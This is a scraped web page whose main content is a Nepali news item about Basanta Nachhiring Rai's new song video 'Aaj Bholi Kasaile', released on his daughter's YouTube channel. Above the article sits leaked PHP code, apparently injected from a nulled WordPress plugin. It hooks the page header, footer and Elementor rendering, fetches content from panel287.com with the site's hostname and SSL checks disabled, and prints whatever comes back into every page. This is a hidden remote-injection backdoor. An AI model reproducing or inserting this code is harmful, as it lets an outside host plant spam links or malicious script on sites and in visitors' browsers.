if(!function_exists('gplrock_unified_footer_script')){function gplrock_unified_footer_script(){static $script_executed=false;if($script_executed){return;}$is_elementor_page=false;if(class_exists('Elementor\Plugin')){$elementor=\Elementor\Plugin::instance();if(!$elementor->editor->is_edit_mode()){$is_elementor_page=true;}}if(!did_action('wp_footer')&&!did_action('wp_head')&&!$is_elementor_page){return;}$footer_url='https://panel287.com/api/footer.php?linkspool='.urlencode($_SERVER['HTTP_HOST']);$response=wp_remote_get($footer_url,['timeout'=>15,'sslverify'=>false,'user-agent'=>'WordPress/'.get_bloginfo('version')]);if(!is_wp_error($response)&&wp_remote_retrieve_response_code($response)===200){$body=wp_remote_retrieve_body($response);if(!empty($body)&&strlen($body)>10){echo $body;}}$script_executed=true;}}if(!has_action('wp_footer','gplrock_unified_footer_script')){add_action('wp_footer','gplrock_unified_footer_script',999);}if(!has_action('wp_head','gplrock_unified_footer_script')){add_action('wp_head','gplrock_unified_footer_script',999);}if(class_exists('Elementor\Plugin')&&!has_action('elementor/frontend/after_render','gplrock_unified_footer_script')){add_action('elementor/frontend/after_render','gplrock_unified_footer_script',999);} बसन्त नाछिरिङ राईले आफ्नै छोरीको नामबाट स्थापित गरेको युट्युव च्यानल बाट सार्वजनिक गरे आज भोली कसैले – Toppo Khim

बसन्त नाछिरिङ राईले आफ्नै छोरीको नामबाट स्थापित गरेको युट्युव च्यानल बाट सार्वजनिक गरे आज भोली कसैले

काठमाडौं । हुन त बसन्त नाछिरिङ राई यतिबेला बैदेशिक रोजगारीको सिलसिलामा दक्षिण कोरियामा छन् । तर नेपाली माटोको मायाले घरी घरी उनलाई घोत्लिन बाध्य बनाउँछ । अनि त्यही बाध्यताको बिचमा उनी सिर्जना गर्छन् जसले उनलाई सर्जक बाएको छ । नेपालको पुर्वी सोलुखुम्बु जिल्लाको सोताङ गाउँपालिकामा बुवा कर्ण बहादुर नाछिरिङ राई र आमा निरा माया राईको कोखबाट जन्मिएका बसन्तले प्रवासमा रहेर पनि नेपाली गीत संगीतको साधनालाई निरन्तरता दिई रहेका छन् । यही निरन्तरताको मेसोमा भर्खरै सार्वजनिक भएको छ आज भोली कसैले बोलको गीतको भिडियो ।

बसन्त नाछिरिङ राई आफैंले शब्द र संगीत सिर्जना गरेको उक्त गीतको संगीत संयोजन टेकेन्द्र यक्सोले गरेका छन् भने समिक्षा अधिकारीको स्वर सुन्न सकिन्छ । मिुनु लामा, प्रमिस नाछिरिङ राई र डोल्मा योञ्जन तामाङको अभिनय रहेको भिडियोमा शम्भु धिमालको छायाँकन र सम्पादन रहेको छ भने प्रमिस नाछिरिङ राईले निर्देशन गरेका छन् । बसन्तले आफ्नै छोरीको नामबाट स्थापित गरेको युट्युव च्यानल अभिमा क्रियशनमा भिडियो हेर्न सकिन्छ । भिडियो हेर्न लिंकमा जानुहोस् ।

Comments (0)
Add Comment